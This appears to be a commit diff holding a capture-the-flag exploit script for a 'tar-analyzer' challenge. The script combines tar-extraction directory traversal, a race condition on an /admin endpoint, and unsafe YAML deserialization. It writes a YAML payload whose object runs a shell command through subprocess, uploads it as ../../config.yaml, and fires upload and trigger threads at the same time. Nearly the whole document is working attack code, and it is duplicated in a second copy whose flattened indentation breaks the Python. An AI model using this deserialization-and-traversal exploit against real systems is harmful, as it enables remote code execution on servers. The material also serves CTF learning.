shpik-kr · June 8, 2020 02:06
diff --git a/exp.py b/exp.py
 #!/usr/bin/python
 import requests
 import os
 import threading
 import yaml
 import subprocess

 '''
 Vulnerabilities:
 1. Directory Traversal + File upload: User can upload to the parent folder because of tarfile.tar's extractall.
 2. Race Condition: When user access "/admin" endpoint, `config.yaml` initializes as default configure.
 3. Remote Command Execution: And load that. `config = load(fp.read(), Loader=Loader)`.

 Attack:
 1. Upload config.yaml that causes RCE, like this(same pickle rce):
 ```
 	class exp(object):
 	    def __reduce__(self):
 	     return (subprocess.check_output,(['ls','-al'],))

 	data = yaml.dump({'allow_host':"blahblah", 'message':exp()}) 
 ```
 2. Get flag by accessing "/admin" endpoint(Race Condition).
 '''

 url = "http://tar-analyzer.ctf.defenit.kr:8080"
 admin_url = url + "/admin"
 upload_url = url + "/analyze"

 def initialize(ip):
 	class exp(object):
 		def __reduce__(self):
 			return (subprocess.check_output,(['ls','-al'],))

 	data = yaml.dump({'allow_host':ip, 'message':exp()}) 

 	with open("../../config.yaml","w") as f:
 		f.write(data)
 	os.system("tar -cvf exp.tar ../../config.yaml")

 def do_trigger():
 	global trigger_yaml_url
 	r = requests.get(admin_url)
 	print(r.text)

 def do_upload_yaml():
 	global upload_url
 	files = {
 		"file": open("exp.tar","rb")
 	}
 	r = requests.post(upload_url, files=files)

 ip = "[here]"
 initialize(ip)
 for idx in range(10):
 	t = threading.Thread(target=do_upload_yaml,args=())
 	v = threading.Thread(target=do_trigger,args=())
 	t.start()
 	v.start()
	#!/usr/bin/python
	import requests
	import os
	import threading
	import yaml
	import subprocess

	'''
	Vulnerabilities:
	1. Directory Traversal + File upload: User can upload to the parent folder because of tarfile.tar's extractall.
	2. Race Condition: When user access "/admin" endpoint, `config.yaml` initializes as default configure.
	3. Remote Command Execution: And load that. `config = load(fp.read(), Loader=Loader)`.

	Attack:
	1. Upload config.yaml that causes RCE, like this(same pickle rce):
	```
	class exp(object):
	def __reduce__(self):
	return (subprocess.check_output,(['ls','-al'],))

	data = yaml.dump({'allow_host':"blahblah", 'message':exp()})
	```
	2. Get flag by accessing "/admin" endpoint(Race Condition).
	'''

	url = "http://tar-analyzer.ctf.defenit.kr:8080"
	admin_url = url + "/admin"
	upload_url = url + "/analyze"

	def initialize(ip):
	class exp(object):
	def __reduce__(self):
	return (subprocess.check_output,(['ls','-al'],))

	data = yaml.dump({'allow_host':ip, 'message':exp()})

	with open("../../config.yaml","w") as f:
	f.write(data)
	os.system("tar -cvf exp.tar ../../config.yaml")

	def do_trigger():
	global trigger_yaml_url
	r = requests.get(admin_url)
	print(r.text)

	def do_upload_yaml():
	global upload_url
	files = {
	"file": open("exp.tar","rb")
	}
	r = requests.post(upload_url, files=files)

	ip = "[here]"
	initialize(ip)
	for idx in range(10):
	t = threading.Thread(target=do_upload_yaml,args=())
	v = threading.Thread(target=do_trigger,args=())
	t.start()
	v.start()